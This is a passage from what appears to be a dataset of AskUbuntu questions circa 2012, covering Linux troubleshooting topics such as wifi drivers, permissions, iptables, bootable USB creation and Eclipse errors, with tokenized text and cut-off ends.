vboxnetadp , vboxnetflt snd_hda_codec_hdmi 32474 1 snd_hda_codec_idt 70795 1 snd_hda_intel 33773 3 snd_hda_codec 127706 3 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel snd_hwdep 13668 1 snd_hda_codec rfcomm 47604 0 bnep 18281 2 snd_pcm 97188 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec bluetooth 180104 10 rfcomm , bnep parport_pc 32866 0 ppdev 17113 0 snd_seq_midi 13324 0 snd_rawmidi 30748 1 snd_seq_midi uvcvideo 72627 0 lib80211_crypt_tkip 17390 0 snd_seq_midi_event 14899 1 snd_seq_midi wl 2568210 0 videodev 98259 1 uvcvideo v4l2_compat_ioctl32 17128 1 videodev snd_seq 61896 2 snd_seq_midi , snd_seq_midi_event binfmt_misc 17540 1 snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq joydev 17693 0 ir_lirc_codec 12859 0 lirc_dev 19204 1 ir_lirc_codec snd 78855 16 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device ir_mce_kbd_decoder 12777 0 i915 473298 2 soundcore 15091 1 snd ir_sony_decoder 12510 0 snd_page_alloc 18529 2 snd_hda_intel , snd_pcm drm_kms_helper 46978 1 i915 lib80211 14381 2 lib80211_crypt_tkip , wl psmouse 97443 0 serio_raw 13211 0 hp_wmi 18092 0 ir_jvc_decoder 12507 0 drm 241921 3 i915 , drm_kms_helper jmb38x_ms 17646 0 i2c_algo_bit 13423 1 i915 memstick 16569 1 jmb38x_ms sparse_keymap 13890 1 hp_wmi ir_rc6_decoder 12507 0 ir_rc5_decoder 12507 0 ir_nec_decoder 12507 0 wmi 19256 1 hp_wmi rc_rc6_mce 12502 0 ene_ir 18457 0 rc_core 26412 10 ir_lirc_codec , ir_mce_kbd_decoder , ir_sony_decoder , ir_jvc_decoder , ir_rc6_decoder , ir_rc5_decoder , ir_nec_decoder , rc_rc6_mce , ene_ir hp_accel 25976 0 lis3lv02d 19876 1 hp_accel video 19596 1 i915 input_polldev 13896 1 lis3lv02d coretemp 13525 0 mac_hid 13253 0 lp 17799 0 parport 46562 3 parport_pc , ppdev , lp usbhid 47199 0 hid 99559 1 usbhid r8169 62099 0 sdhci_pci 18826 0 sdhci 33205 1 sdhci_pci
193757	how can someone with minimum programming experience publish an app of an existing program not found in the software centre ?	there 's a free mathematics software that i would like to see in ubuntu software centre , called , 'sage . ' i have minimal experience in programming , so i 'm basically here asking if someone could either tell me how to accomplish this without said instructions being completely over my head or if someone could do it for me . for further information here 's the sage homepage : http : //sagemath.org/ and the .tar.lzma file for its installation is ~500mb and it takes around 2.2 gb on the hdd when installed , i found at least on 32 bit i386 ubuntu 12.04 lts . any help will be greatly appreciated !
193759	how to create an icon theme/set for ubuntu ?	i am looking to create an icon theme for ubuntu unity . this is a first time effort , so i was looking for answers from people who have experience in the matter . how do i go about creating an icon set for ubuntu ? the basics at least .
193762	ubuntu 10.04 on dell xps 1702x : wlan0 no such device	i am using a dell xps l702x and i am using ubuntu 10.04 because i need to use f77 ( do n't ask ) and i was n't able to get it working on later versions of ubuntu . i can not use the wifi at all . i have tried to fix it and have had limited success ( changed the output from rfkill list all from hard blocked : yes , to hard blocked : no ) . here is the output from rfkill list all aodhan @ aodhan-laptop : ~ $ rfkill list all 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : dell-wifi : wireless lan soft blocked : no hard blocked : no 2 : dell-bluetooth : bluetooth soft blocked : no hard blocked : no here is the output from iwconfig : aodhan @ aodhan-laptop : ~ $ iwconfig lo no wireless extensions . eth0 no wireless extensions . pan0 no wireless extensions . and here is the output from ifconfig -a : aodhan @ aodhan-laptop : ~ $ ifconfig -a eth0 link encap : ethernet hwaddr 5c : f9 : dd:3d : f2 : f7 inet addr:192.168.1.17 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :5ef9 : ddff : fe3d : f2f7/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:3417 errors:0 dropped:0 overruns:0 frame:0 tx packets:2894 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:3317567 ( 3.3 mb ) tx bytes:505049 ( 505.0 kb ) interrupt:30 base address:0x2000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:12 errors:0 dropped:0 overruns:0 frame:0 tx packets:12 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:720 ( 720.0 b ) tx bytes:720 ( 720.0 b ) pan0 link encap : ethernet hwaddr 7e:7e : e8:39:70 : af broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) and finally , the output from lspci : 00:00.0 host bridge : intel corporation device 0104 ( rev 09 ) 00:01.0 pci bridge : intel corporation sandy bridge pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation device 0116 ( rev 09 ) 00:16.0 communication controller : intel corporation cougar point heci controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation cougar point usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation cougar point high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation cougar point pci express root port 1 ( rev b5 ) 00:1c.1 pci bridge : intel corporation cougar point pci express root port 2 ( rev b5 ) 00:1c.3 pci bridge : intel corporation cougar point pci express root port 4 ( rev b5 ) 00:1c.4 pci bridge : intel corporation cougar point pci express root port 5 ( rev b5 ) 00:1c.5 pci bridge : intel corporation cougar point pci express root port 6 ( rev b5 ) 00:1d.0 usb controller : intel corporation cougar point usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation device 1c4b ( rev 05 ) 00:1f.2 sata controller : intel corporation cougar point 6 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation cougar point smbus controller ( rev 05 ) 01:00.0 vga compatible controller : nvidia corporation device 1246 ( rev a1 ) 03:00.0 network controller : intel corporation device 008a ( rev 34 ) 04:00.0 usb controller : nec corporation device 0194 ( rev 04 ) 0a:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) please help me ! thank you in advance . edit : further info - this is a dual install with a windows 7 system as the other option . however , i ca n't access that until tomorrow ( i wo n't have access to the windows 7 disc until then , and grub is n't letting me load it ) . therefore , i ca n't be sure whether it still works on that or not . it used to , though .
193765	12.04 admin links	i have recently upgraded my 10.04 system to 12.04 . i can not find the admin links to allow me to check for system updates on 12.04 like i could on 10.04 . am i just not seeing them or have they been removed from 12.04 ?
193768	will installing cinnamon break my settings ?	i 'm not sure the title is clear so i 'll try to specify . i currently have ubuntu 12.04 with gnome installed on it . i 've done at least 16 hours of random tweaking and reading , mostly to give myself a better user experience . i 've installed and modified sublime text 2 , installed a bunch of drivers , software , transferred files , etc . i want to know if i install cinnamon and use it instead of gnome , will it change my settings ? for example , i have a `` show desktop '' keybinding set up ( super + d ) that took me a while to figure out how to get working , will cinnamon make me re-modify it ?
193770	how do i disable the on/off button on my notebook ?	i need to disable the power button of my laptop . it happens that sometimes i press it by mistake and my work goes . it 'd be optimal for me to make this button inoffensive , e.g . nothing happens pressing it . how i do that in ubuntu 12.04 ? actually if i press the button this popup appears :
193772	i want to sell my computer , how can i `` preinstall '' ubuntu without configuring it ?	i basically want to install the installer , so that when the computer boots it will boot into the installer from the hard driver . i am selling my computer and i want a fresh copy of ubuntu to be on it when the buyer receives it . how can i do this ?
193773	can i configure unattended upgrades to not upgrade packages that require a reboot ?	i want to have automatic upgrades enabled , but not have my machines automatically reboot . i 'd rather install those packages as part of a maintenance regiment that would also reboot the machines . right now we run automatic upgrades , but the machines keep reporting a need to be rebooted . any guide would be appreciated .
193774	how to efficiently navigate through all application windows in unity ( aka alt-tab )	in unity , alt-tab initially shows only one icon per application . often i have multiple terminal windows , and i prefer navigating to them via keyboard . here are the different options i have found , and the problems i have with each of them : alt-tab : needs more key strokes to show all icons and to navigate through them . super-w : shows all windows , but key navigation ( arrow keys ) does n't work . is there any upcoming resolution ? thanks
193775	upgrade 12.04 to 12.10	is it a good idea to upgrade ubuntu 12.04 to 12.10 now or should we wait for some more time ? are there any specific annoying things in 12.10 or it just works fine ? i 've heard that the dash is integrated with the amazon search results . is that annoying ?
193777	how can i convert a coloured icon to a monochrome one ?	i recently compiled goldendict from source . to my dismay i discovered that there were no monochrome appindicator icons included . at the moment i am stuck with this : i tried converting the icons to b/w using gimp , but it still does n't look quite right : how can i modify the icons to fit with the rest of the theme ? these are the icons in question :
193778	how to align conky text to centre of desktop ?	i am working on creating an entire theme based off of coldplay 's mylo xyloto album . this is my first time working with conky and theme creation . i started off by creating the conky setup : i would like to how to centre the text in conky . first to have it placed in the centre of my desktop , and second to have the text centre ( think the centre align button in word ) . it is supposed to be aligned like the album art : conky script http : //paste.ubuntu.com/1230966/ end result using answer bellow :
193786	will the new technologies in 12.10 be backported to 12.04	i was wondering if the new dash animations and web apps and other new technologies be backported to 12.04 ?
193788	php may be executing as a `` privileged '' group and user , which could be a serious security vulnerability	i ran some security tests on a ubuntu 12.04 server , and i 've got these warnings : php may be executing as a `` privileged '' group , which could be a serious security vulnerability . php may be executing as a `` privileged '' user , which could be a serious security vulnerability . in /etc/apache2/envvars , i have this : export apache_run_user=www-data export apache_run_group=www-data and all files in /var/www are having these user/group : www-data : www-data am i setting this correctly ? what should i do to fix this problem ?
193790	chmod - file permission on writable	i am running ubuntu 12.04 x64 server on ext4 partition . i set a directory 's permission to '766 ' as below . sudo chmod 766 /archive drwxrw-rw- 3 root root 4096 sep 27 10:50 archive/ but , when i tried to create new file through vi editor , permission error has occured . vi /archive/test.txt -- -- -- -- > `` /archive/test.txt '' [ permission denied ] i thought i had `` write '' permission . could anyone help me what is the problem ?
193799	error when installing from livecd - unable to find a medium containing a live file systemâ	i have read the other post but seems like they did not help my problem ... so im getting unable to find a medium containing a live file systemâ error when installing it gets to a certin line in the command line then errors out with that message . is there a way or a work around ? ? i also tried to boot from usb but its booting straight into windows . i have changed all bios settings and changed boot order but still going right to windows the only way it gets some sort of boot is from the livecd . what am i not doing or what am i doing wrong ? ? is ther a program i can dl to check and see if the medium is bootable ? pc = hp omni 120-1134 ( all-in-one )
193800	how do you hide the panels in 12.04 2d ?	i run mythbuntu , and the panels in 2d apparently can not be hidden ? is there a way to do this ?
193807	installing ubuntu on one of two hard drives	i have two hard drives . one is used for windows and one is empty . i want to install ubuntu on the empty hard drive . the windows hard drive is disk0 in windows and the empty hard drive is disk1 . when i install ubuntu and it asks where i want to install it , i choose `` something else '' but i am stuck there . what do i choose for `` boot loader installation '' ?
193809	computer responds slowly when screen is locked	when my computer is locked , regardless of it timing out after 10 minutes or by me pressing ctrl+l , it takes forever to activate it . it also appears as if the time it takes is linear to the time it as been locked . if i lock my computer in the evening , at 8 o'clock in the morning it will take between one or two minutes to get the login-prompt when touching any keys or moving the mouse . the computer somewhat responds immediately though , the cpu-fan goes into hyper-drive , ergo it 's doing something . if i 've left the system monitor running , it will show both cpu 's becoming rather busy the second i touched a key . running dmesg does n't reveal any errors or indications about what it has been spending time on . i 'm running gnome classic , with the following settings : system settings : power system settings : brightness and lock worth mentioning is that this behavior was introduced with 12.04 , i had no issues whatsoever with 11.10 . if anybody could help me fix this rather annoying issue my ulcer will go away .
193823	how can i use cron-apt to download and install updates between midnight and 5am ?	i have capped data which is essentially free between midnight and 5am . as a result , i would like to set ubuntu to automatically download updates over that time . it seems that cron-apt is what i need , but the documentation and syntax is sketchy and unintuitive . can anyone tell me how to use it to schedule downloads ? it can install the updates at the same time as far as i 'm concerned , but that 's not such a big issue - i can run those at a later stage .
193824	all sound missing ! edd information missing ! help to modify kernel ?	problem solved by updating from 12.04 to 12.10 . system settings/sound does not open , freezes and i have to force close . speaker symbol with volume control does not open scroll-down menu , and there is no sounds . many people have problems with hudson azalia in ubuntu , but i found no working solution . i do n't really understand much of this , but here are some more details : aplay -l : **** list of playback hardware devices **** ( after running this one , it starts some kind of process that does n't get any results , and does n't stop , terminal has to be shut down ) lspci -vnn | grep -ia5 audio : 00:01.1 audio device [ 0403 ] : advanced micro devices [ amd ] nee ati device [ 1002:9902 ] subsystem : hewlett-packard company device [ 103c:184c ] flags : bus master , fast devsel , latency 0 , irq 53 memory at f0444000 ( 32-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel -- 00:14.2 audio device [ 0403 ] : advanced micro devices [ amd ] hudson azalia controller [ 1022:780d ] ( rev 01 ) subsystem : hewlett-packard company device [ 103c:184c ] flags : bus master , slow devsel , latency 32 , irq 54 memory at f0440000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel it seems to me that i 'm currently running hda intel drivers on my amd hudson azalia soundcard . i ca n't see what drivers this soundcard uses . update : i 've noticed after some more using , that any program , asked to play a sound of any kind , instantly freezes . also the part of all settings that has anything to do with sound , does n't exist . aplay -l returns a empty list , my standard vollumecontroll just is n't there , and rhythmbox and banshee both freezes on startup ! ive installed pretty much every pakage i can find in the software center that has anything to do with sound , and nothing works ! would really appreciate some help with this ! update : ive tried to fresh install the ubuntu 12.10 beta 2 , hoping it 's exstended suport for newer hardware would solve my problems , and it did , kind of . i can now hear the beutifull login-sound ! only the screen stays black . not comand-line black , more , shut-off black . there is nothing . the fan and the small indicatorlight on my power-on button are the only things telling me the computer is at all turned after the login-sound is played on 12.10 . so i went back to 12.04 , and this time around , i got an edd information missing error , and it will only boot from the live cd ( or usb-disk in this case ) , and when i do start it with the live usb , everything conected to sound is missing , once again . when i turn of the computer there is always a message telling me that gnome-settings-deamon is not responding , and must be force -closed . i find thiss odd , since ubuntu is using unity by default ? ( i have not yet installed gnome , as my entire system is cripled ) it seems the whole sound-settings part of the system went missing , so i thought it might be something wrong with the live-image i used to create the usb-disk . dowloaded a new one , installed again , no success . same edd error , same problem . just to try if any linux distro could work on my machine , i installed fedora 17 , works like a charm strait out of the box . only problem is i dont like fedora , i dont understand it , i cant even install applications on it , so i want back to ubuntu , where i belong . but i cant fix this error . booting with the arguments edd=on and nolapic and also removing quiet splash , i recieved , among many others , these errors : 'unlink after irq ... probably using the wrong irq' 'pci inta - > link [ lnkb ] - > gsi 11 ( level , low ) - > irq 11' begin : mounting root file system ... ... [ 50.709152 ] r8169 0000:05:00.0 : pci inta - > rtl8195e at 0xf8436000 , 28:92:4a:43:37:2a xid 00c00000 irq 11 unable to enumerate usb device on port 3 gave up waiting for root device . coomon problems : boot args ( cat /proc/cmdline ) rootdelay root missing modules ( cat /proc/modules ; ls /dev )
193825	how can i rip a copyprotected audio cd	banshee hangs when i try to load an audio cd with `` bmg-copycontrol '' . the same with sound juicer . how can i extract it ? according to wikipedia this copy control was used during 2001-2006 . the web page , which is near the copy-control logo is not accessible any more .
193831	nautilus 3.4 wit nautilus 3.6 interface	i am not a fan of the 3.6 release , but i like how it looks . is there a way to get the nautilus 3.6 interface ? on my nautilus 3.4 ?
193835	using squid and apache	i 've installed squid3 on my ubuntu 12.04 . i changed the http_port to 80 . when i type 10.1.1.103 in the `` the requested url could not be retrieved '' from squid . do i have to run apache as my web server or squid has a web server itself to run the web files ? i am a little bit confused here . i am asked to setup squid on top of apache but i ca n't find the way to integrate them .
193836	is there a console application equivalent to total commander 's fast file viewer ( f3 ) ?	is there a console application equivalent to total commander 's fast file viewer ( f3 ) ? total commander 's ( windows app ) f3 viewer can instantly `` open '' files of any size . the file contents is only read from the disk if you need it : that is , if you scroll or search inside the file . is there an alternative app for linux/ubuntu that will do the same , but from the console ? being a `` console '' app is essential , otherwise there are plenty of total commander alternatives that i know of having a `` view '' /f3 option .
193846	how do i get the graphics working on a samsung r470 ?	i recently installed a fresh ubuntu 12.04 lts on a samsung r470 laptop . before there was ubuntu 10. ? ? running with kernel 3.0.0- ? ? and everything was working fine . but now after startup when the login screen appears the computer freezes and everything is full of pixel errors and strange graphic artefacts . in the beginning sometimes the ubuntu sound appears and it 's possible to move the mouse cursor for a few seconds but then all freezes . not even ctrl+alt+f1 works to switch to a console . starting in recovery mode is not very helpful either . activating the network does n't succeed as well as repairing broken packages . failsafex terminates with the error `` no screens found '' . however with a detour over recovery mode i can log in normaly as user without gui . fist i updated with apt-get update and apt-get upgrade all packages and tried as well to install the newest proprietary nvidia drivers ( they were already installed ) . no changes , after booting the log in screen freezes . here is the info on the graphics card : 01:00.0 vga compatible controller : nvidia corporation g98m [ geforce g105m ] ( rev a2 ) subsystem : samsung electronics co ltd device c059 kernel driver in use : nvidia kernel modules : nvidia_current , nouveau , nvidiafb the file /var/log/xorg.0.log is empty but i posted the content of /var/log/xorg.0.log.old here . thanks a lot to anyone who can help in solving the problem or in specifying it in a bit more detail .
193847	can i install just the unity desktop on top of another distro ?	i 'm wondering whether it is possible to take any distro other than ubuntu ( and its derivatives ) and put unity/ubuntu-hud on top of it , just like you would for instance install lxde onto any distro that came with a different desktop that you did n't like ? i have done apt-get install ubuntu-desktop on my machine running bodhi linux , but practically got it transformed into ubuntu , that install pulling all of the ubuntu apps automatically . what i wanted though was to use only the applications i had , in a different gui . is this possible , and if yes , how ? thanks , ben
193853	updated bios on computer with windows 7 and ubuntu , now nothing works	downloaded the bios update and installed it on windows , it got through installing and restarted the computer , it auto loads into ubuntu so it just sat there and did nothing because the mouse and keyboard would n't work . so after a while i held the power button down to turn it off and then pushed it again , it runs through the power on tests and all that stuff but the monitor and mouse do n't have any power to them so it shows nothing and does nothing . so is there any way too get it working again ? or keep all the stuff on the hard drive and reinstall windows and ubuntu ?
193855	problem with ubuntu 12.04 login	just need some quick help . i looked at some websites and watched a couple of vids and decided to completely switch to this os . i did an install from windows 7 to this os version 12.04 through usb . the installation goes smooth . the problem is after installation though . whenever i login it freezes on me . it just shows the default wallpaper and nothing really happens . i 've re-installed about 3 times now and the same problem occurs . hopefully there 's a way to solve this quickly . thanks for the help in advance !
193858	how to delete or unblock an ip address listed in iptables firewall ?	i am trying to delete an ip address that appears listed on the server 's iptable . i 'm using the following command to list the ips : iptables -l input -n -- line-numbers giving me a result like : chain input ( policy accept ) num target prot opt source destination 1 acctboth all -- 0.0.0.0/0 0.0.0.0/0 2 drop all -- xxx.xx.xx.xx 0.0.0.0/0 question : how to delete or unblock the entry number two , listed as xxx.xx.xx.xx ?
193860	radeon hd 5450 and kubuntu 12.04 lts	i wonder , can radeon hd 5450 handle kubuntu 12.04 lts ? i would like to know before i actually the entire fully kubuntu lts .
193861	what is the difference between lubuntu and lxde ?	i am planning on using lubuntu , or lxde . one is a distro , one is a de , both are the same ? i am confused . what would be the best way to go about installing ? fresh from terminal after installing ubuntu 12.04 ? from scratch without ubuntu 12.04 ? if that is possible . should i get lxde or lubuntu ?
193871	keyboard shortcut for dash previous ?	in 12.10 , there is a `` preview feature '' , which shows a preview upon right-clicking the result in the dash . i would like to know if there is an equivalent on the keyboard to bring up this preview for the selected item , because i do not use a mouse very often .
193873	my minitube stopped playing , any suggestions why ?	my minitube program suddenly stopped playing , frozen sound and video . any suggestions why this happened . i am using ubuntu 11.10 . i uninstalled and reinstalled minitube , but still the same .
193874	creating flash drive from os x broke my usb ?	i downloaded ubuntu .iso file from ubuntu.com and wanted to make a bootable usb stick from my macbook pro , i use os x 10.8 ( mountain lion ) . i followed instructions from here . when i did do the sudo dd if=/path/to/downloaded.img of=/dev/rdiskn bs=1m command , in 88 seconds it said : the disk you inserted was not readable by this computer . where i see `` initialize ... '' , `` ignore '' and `` eject '' buttons and the terminal gave me following message : 694+1 records in 694+1 records out 728018944 bytes transferred in 88.467946 secs ( 8229183 bytes/sec ) my question is not how do i install ubuntu after this , my question is how do i `` recover '' my usb stick ? if i get it out and insert back it gives me the same error message that my disk is not readable . when i try to use sudo gpt recover i get the same message about my disk not being readable , and this in terminal : gpt recover : /dev/disk2 : error : device contains a mbr
193877	ca n't boot windows xp after installing ubuntu 12.04	so i installed ubuntu 12.04 alongside windows xp , and i played with it for a like an hour . when i wanted to go back to windows , i chose the windows option in the grub screen . it just gives a black screen and goes back to grub . i tried boot-repair as i 've seen in some other post that it could resolve the problem , but it 's all the same . nothing changed . i can use ubuntu but not windows . can someone please tell me how i can solve this ? thanks . http : //paste.ubuntu.com/1231432/
193882	permission to run telnet from a webpage	i 'm trying to run telnet : localhost:2017 from a firefox webpage in ubuntu 10.10 . i have created the necessary file association within firefox to launch telnet , but i think i need to give apache the permissions to run that file . any ideas ? ?
193884	can i create a proprietary application using qt ?	i am using qt4 to build an application and for some reason i want to keep it proprietary . qt4 is released under lgpl , does that force me to release the code to my application . i ask this question because i am finding it difficult to understand the lgpl license .
193890	script to recursively grep data from certain files in the directory	i am making a simple shell script which will minimize the time i spend in searching all directories under a parent directory and grep some things inside some files . here 's my script . # ! /bin/sh maindir=/var/opt/database/1227-1239/ cd `` $ maindir '' for dir in $ ( ls ) ; do grep -i `` stage , te_start_seq starting '' `` $ dir '' /his_file | tail -1 > > /home/xtee/sst-logs.out if [ -f `` $ dir '' /sysconfig.out ] ; then grep -a 1 `` drive model '' `` $ dir '' /sysconfig.out | tail -1 > > /home/xtee/sst-logs.out else grep -m 1 `` physical memory size '' `` $ dir '' /node0/setupsys.out | tail -1 > > /home/xtee/sst-logs.out fi done the script is supposed to grep the string stage , te_start_seq starting under the file his_file then dump it sst-logs.out which it does . my problem though is the part in the if statement . the script should check the current directory for sysconfig.out , grep drive model and dump it to sst-logs.out if it exists , otherwise , change directory to node0 then grep physical memory size from setupsys.out and dump it to sst-logs.out . my problem is , it seems the if then else statement seems not to work as it doesn`t dump any data at all but if i execute grep manually , i do have data . what is wrong with my shell script ? is there any more efficient way in doing this ?
193891	filesystem that gives an encrypted view of a directoryâthe inverse of encfs	currently i 'm using encfs to encrypt my directory `` confidential '' to `` .encconfidential '' and sync that encrypted directory using an online service ( e.g . dropbox , ubuntuone etc ) . however my entire disk is already luks encrypted , so the double encryption takes a toll on performance . i wonder is there an `` inverted '' encfs option ? an unencrypted directory gets mounted and in the mounted directory you only see encrypted files . so i could work with the unencrypted documents while the sync tool sees and read/writes the encrypted files only . clarification : my primary use case is sync not backup . i want to be able to securely keep machines in sync without the double encryption penalty when operating local ( i have to wait when i hit save , compared to transmission time an encrypted operation is a minimal increment in time - and it is background time , not user time )
193892	iso passes sha tests , but deb packages on installation do n't match md5	i am trying to install ubuntu server 12.04 in vmware , and every time i try it reports that several files in the iso are corrupt . i have tried re-downloading several times and it has not helped . what can i do ? 9c21c99bab91462b6ca779bfcaccb1de466b9ad0309a9dbd6d196b4918cc72ef *ubuntu-12.04.1-server-amd64.iso provided 9c21c99bab91462b6ca779bfcaccb1de466b9ad0309a9dbd6d196b4918cc72ef - check output x.x looks fine , guess ill try another mirror . i tried another mirror and got the same thing . the ./pool/main/s/sphinx/python-sphinx_1.1.3+dfsg-2ubuntu2.1_all.deb file failed the md5 checksun verification . your cd-rom or this file may have been corrupted . could it be a bad release ?
193895	ca n't run eclipse after installing adt plugin	so , i 've installed the adt plugin , run a helloworld , restart my computer and after that the eclipse ca n't run . a message appear : '' an error has ocurred . see the log file : /home/todi ( ... ) '' here is the log file : ! session 2011-07-26 22:51:59.381 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eclipse.buildid=i20110613-1736 java.version=1.6.0_26 java.vendor=sun microsystems inc. bootloader constants : os=win32 , arch=x86 , ws=win32 , nl=pt_br framework arguments : -product org.eclipse.epp.package.java.product command-line arguments : -os win32 -ws win32 -arch x86 -product org.eclipse.epp.package.java.product ! entry org.eclipse.update.configurator 4 0 2011-07-26 22:57:34.135 ! message could not rename configuration temp file ! entry org.eclipse.update.configurator 4 0 2011-07-26 22:57:34.157 ! message unable to save configuration file `` c : \program files\eclipse\configuration\org.eclipse.update\platform.xml.tmp '' ! stack 0 java.io.ioexception : unable to save configuration file `` c : \program files\eclipse\configuration\org.eclipse.update\platform.xml.tmp '' at org.eclipse.update.internal.configurator.platformconfiguration.save ( platformconfiguration.java:690 ) at org.eclipse.update.internal.configurator.platformconfiguration.save ( platformconfiguration.java:574 ) at org.eclipse.update.internal.configurator.platformconfiguration.startup ( platformconfiguration.java:714 ) at org.eclipse.update.internal.configurator.configurationactivator.getplatformconfiguration ( configurationactivator.java:404 ) at org.eclipse.update.internal.configurator.configurationactivator.initialize ( configurationactivator.java:136 ) at org.eclipse.update.internal.configurator.configurationactivator.start ( configurationactivator.java:69 ) at org.eclipse.osgi.framework.internal.core.bundlecontextimpl $ 1.run ( bundlecontextimpl.java:711 ) at java.security.accesscontroller.doprivileged ( native method ) at org.eclipse.osgi.framework.internal.core.bundlecontextimpl.startactivator ( bundlecontextimpl.java:702 ) at org.eclipse.osgi.framework.internal.core.bundlecontextimpl.start ( bundlecontextimpl.java:683 ) at org.eclipse.osgi.framework.internal.core.bundlehost.startworker ( bundlehost.java:381 ) at org.eclipse.osgi.framework.internal.core.abstractbundle.start ( abstractbundle.java:299 ) at org.eclipse.osgi.framework.util.secureaction.start ( secureaction.java:440 ) at org.eclipse.osgi.internal.loader.bundleloader.setlazytrigger ( bundleloader.java:268 ) at org.eclipse.core.runtime.internal.adaptor.eclipselazystarter.postfindlocalclass ( eclipselazystarter.java:107 ) at org.eclipse.osgi.baseadaptor.loader.classpathmanager.findlocalclass ( classpathmanager.java:462 ) at org.eclipse.osgi.internal.baseadaptor.defaultclassloader.findlocalclass ( defaultclassloader.java:216 ) at org.eclipse.osgi.internal.loader.bundleloader.findlocalclass ( bundleloader.java:400 ) at org.eclipse.osgi.internal.loader.bundleloader.findclassinternal ( bundleloader.java:476 ) at org.eclipse.osgi.internal.loader.bundleloader.findclass ( bundleloader.java:429 ) at org.eclipse.osgi.internal.loader.bundleloader.findclass ( bundleloader.java:417 ) at org.eclipse.osgi.internal.baseadaptor.defaultclassloader.loadclass ( defaultclassloader.java:107 ) at java.lang.classloader.loadclass ( unknown source ) at org.eclipse.osgi.internal.loader.bundleloader.loadclass ( bundleloader.java:345 ) at org.eclipse.osgi.framework.internal.core.bundlehost.loadclass ( bundlehost.java:229 ) at org.eclipse.osgi.framework.internal.core.abstractbundle.loadclass ( abstractbundle.java:1207 ) at org.eclipse.equinox.internal.ds.model.servicecomponent.createinstance ( servicecomponent.java:480 ) at org.eclipse.equinox.internal.ds.model.servicecomponentprop.createinstance ( servicecomponentprop.java:271 ) at org.eclipse.equinox.internal.ds.model.servicecomponentprop.build ( servicecomponentprop.java:332 ) at org.eclipse.equinox.internal.ds.instanceprocess.buildcomponent ( instanceprocess.java:588 ) at org.eclipse.equinox.internal.ds.servicereg.getservice ( servicereg.java:53 ) at org.eclipse.osgi.internal.serviceregistry.serviceuse $ 1.run ( serviceuse.java:138 ) at java.security.accesscontroller.doprivileged ( native method ) at org.eclipse.osgi.internal.serviceregistry.serviceuse.getservice ( serviceuse.java:136 ) at org.eclipse.osgi.internal.serviceregistry.serviceregistrationimpl.getservice ( serviceregistrationimpl.java:468 ) at org.eclipse.osgi.internal.serviceregistry.serviceregistry.getservice ( serviceregistry.java:467 ) at org.eclipse.osgi.framework.internal.core.bundlecontextimpl.getservice ( bundlecontextimpl.java:594 ) at org.osgi.util.tracker.servicetracker.addingservice ( servicetracker.java:450 ) at org.osgi.util.tracker.servicetracker $ tracked.customizeradding ( servicetracker.java:980 ) at org.osgi.util.tracker.servicetracker $ tracked.customizeradding ( servicetracker.java:1 ) at org.osgi.util.tracker.abstracttracked.trackadding ( abstracttracked.java:262 ) at org.osgi.util.tracker.abstracttracked.trackinitial ( abstracttracked.java:185 ) at org.osgi.util.tracker.servicetracker.open ( servicetracker.java:348 ) at org.osgi.util.tracker.servicetracker.open ( servicetracker.java:283 ) at org.eclipse.core.internal.runtime.internalplatform.getbundlegroupproviders ( internalplatform.java:225 ) at org.eclipse.core.runtime.platform.getbundlegroupproviders ( platform.java:1261 ) at org.eclipse.ui.internal.ide.ideworkbenchplugin.getfeatureinfos ( ideworkbenchplugin.java:291 ) at org.eclipse.ui.internal.ide.workbenchactionbuilder.makefeaturedependentactions ( workbenchactionbuilder.java:1217 ) at org.eclipse.ui.internal.ide.workbenchactionbuilder.makeactions ( workbenchactionbuilder.java:1026 ) at org.eclipse.ui.application.actionbaradvisor.fillactionbars ( actionbaradvisor.java:147 ) at org.eclipse.ui.internal.ide.workbenchactionbuilder.fillactionbars ( workbenchactionbuilder.java:341 ) at org.eclipse.ui.internal.workbenchwindow.fillactionbars ( workbenchwindow.java:3564 ) at org.eclipse.ui.internal.workbenchwindow . ( workbenchwindow.java:419 ) at org.eclipse.ui.internal.tweaklets.workbench3ximplementation.createworkbenchwindow ( workbench3ximplementation.java:31 ) at org.eclipse.ui.internal.workbench.newworkbenchwindow ( workbench.java:1920 ) at org.eclipse.ui.internal.workbench.access $ 14 ( workbench.java:1918 ) at org.eclipse.ui.internal.workbench $ 68.runwithexception ( workbench.java:3658 ) at org.eclipse.ui.internal.startupthreading $ startuprunnable.run ( startupthreading.java:31 ) at org.eclipse.swt.widgets.runnablelock.run ( runnablelock.java:35 ) at org.eclipse.swt.widgets.synchronizer.runasyncmessages ( synchronizer.java:135 ) at org.eclipse.swt.widgets.display.runasyncmessages ( display.java:4140 ) at org.eclipse.swt.widgets.display.readanddispatch ( display.java:3757 ) at org.eclipse.ui.application.workbenchadvisor.openwindows 